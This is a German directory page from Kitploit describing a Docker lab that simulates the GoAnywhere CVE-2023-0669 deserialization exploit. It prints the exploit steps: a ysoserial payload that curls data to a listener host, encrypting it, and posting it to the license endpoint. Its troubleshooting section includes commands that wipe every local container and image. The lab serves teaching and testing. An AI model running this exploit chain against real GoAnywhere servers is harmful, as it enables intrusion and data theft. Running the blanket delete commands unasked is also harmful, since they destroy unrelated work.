Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2023-0669-simulation — Simulationsumgebung für CVE-2023-0669 mit Docker-basiertem Angreifer, anfälligem Server und Listener-Containern. Zeigt die Generierung von Deserialisierungs-Exploits, Payload-Verschlüsselung und Datenextraktion. | Kitploit
Tools/GitHubGitHub/zakaria-laouani/cve-2023-0669-simulation
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationDatenexfiltrationCommand and Control
GitHubzakaria-laouani/cve-2023-0669-simulation

cve-2023-0669-simulation

Simulationsumgebung für CVE-2023-0669 mit Docker-basiertem Angreifer, anfälligem Server und Listener-Containern. Zeigt die Generierung von Deserialisierungs-Exploits, Payload-Verschlüsselung und Datenextraktion.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 7 MonatenNoch nicht geprüft

Projektstruktur

cve-2023-0669-simulation/ ├── docker-compose.yml ├── attacker/ │ ├── Dockerfile │ └── CVE_2023_0669_helper.java ├── vulnerable/ │ ├── Dockerfile │ └── VulnerableServer.java ├── listener/ │ ├── Dockerfile │ └── server.py └── received/ ← automatisch erstellt (Exfiltration)

2. Starte die 3 Container (Angreifer, Verwundbar, Listener)

docker-compose up --build

Problem: Fehler KeyError: 'ContainerConfig' bei docker compose up

Dieses Projekt erfordert:

  • Docker Engine: v24 oder v25 mindestens
  • Docker Compose: v2.20+ (automatisch mit Docker enthalten) KeyError: 'ContainerConfig' bei docker compose up Dies wird in der Regel durch veraltete oder beschädigte Docker-Metadaten oder alte Images verursacht. Entfernen Sie die beschädigten Container, Images und Metadaten:

docker compose down --remove-orphans

docker rm -f $(docker ps -aq)

docker rmi -f $(docker images -q)

Dann bauen Sie sauber neu auf:

docker compose build --no-cache

docker compose up

3. Betrete den Angreifer-Container

docker exec -it attacker bash

Generierung des sicheren Payloads (sendet nur eine Nachricht)

java -jar ysoserial-all.jar CommonsCollections6 'curl -s http://listener:8080/receive -d "PWNED-CVE-2023-0669-simulation-$(date)"' > payload.ser

Verschlüsselung des Payloads

java CVE_2023_0669_helper payload.ser 1

→ Kopiere die gesamte lange Zeichenkette, die angezeigt wird (Strg+A, dann Strg+C)

Senden des Exploits (ersetze LA_CHAINE durch das, was du gerade kopiert hast)

curl -X POST http://vulnerable:8001/goanywhere/lic/accept
-d "encryptedLicenseResponseData=LA_CHAÎNE_BASE64_ICI"
-d "acceptLicense=true"

7. Sofortiges Ergebnis

Du wirst in den Logs des Listeners (oder im Verzeichnis ./received auf deinem PC) sehen:

PWNED ! Empfangen 42 Bytes → PWNED-CVE-2023-0669-simulation-Sat 06 Dec 2025...

Tool herunterladen